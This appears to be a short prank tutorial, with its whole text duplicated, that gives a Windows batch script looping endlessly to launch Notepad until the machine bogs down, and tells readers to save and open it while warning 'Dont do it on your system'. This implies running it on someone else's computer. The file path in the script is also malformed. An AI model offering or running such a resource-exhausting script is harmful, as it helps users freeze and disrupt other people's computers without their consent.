Follow these steps:
1) Open notepad and type code:
echo off
:top
start %SystemRoot%system32notepad.exe
goto top
2) Save file like filename.bat and close it
3) Now open bat file and see what happen. Dont do it on your system.
enjoy...:)
1) Open notepad and type code:
echo off
:top
start %SystemRoot%system32notepad.exe
goto top
2) Save file like filename.bat and close it
3) Now open bat file and see what happen. Dont do it on your system.
enjoy...:)